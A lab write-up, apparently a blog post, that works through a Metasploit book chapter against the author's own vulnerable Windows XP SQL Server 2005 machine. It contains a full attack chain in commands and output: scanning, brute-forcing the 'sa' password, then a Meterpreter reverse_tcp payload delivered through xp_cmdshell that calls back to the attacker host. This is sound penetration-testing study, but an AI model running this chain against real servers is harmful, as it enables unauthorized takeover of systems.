I’m targeting the MS MSQL Server on the Windows portion of my Virtual Hacking Lab and following instructions given in Chapter 6 (Meterpreter) of Metasploit: The Penetration Tester’s Guide.
The exploitee system comprises: Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
Fist step: Nmap scan from within Metasploit: The pertinent results for this exploit are:
1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399.00
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Interestingly, Nmap couldn’t definitively identify which Windows Servce Pack, but of course I know it’s Service Pack 2.
MS SQL is installed by default on TCP port 1433 and UDP port 1434, so I need to confirm port 1434:
nmap -sU 192.168.1.79 -p1434
PORT STATE SERVICE
1434/udp open|filtered ms-sql-m
And the scan confirms this.
Now to use Metasploit mssql_ping to pick up more information:
msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit[*] SQL Server information for 192.168.1.79:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Lots of information here, now to brute force MS SQL with mssql_login:
>msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txt
PASS_FILE => /usr/share/set/src/fasttrack/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > exploit[+] 192.168.1.79:1433 – MSSQL – successful login ‘sa’ : ‘password1′
MS SQL password and login successfully guessed.
Now to use the mssql_payload which exploits xp_cmdshell:
msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(mssql_payload) > set PASSWORD password1
PASSWORD => password1
msf exploit(mssql_payload) > exploit[*] Started reverse handler on 192.168.1.70:443
[*] The server may have xp_cmdshell disabled, trying to enable it…
[*] Command Stager progress – 1.47% done (1499/102246 bytes)[....]
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Command Stager progress – 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100meterpreter >
So I’m inside the target machine with the Meterpreter shell.
In my next post I will explore what to do next with Meterpreter.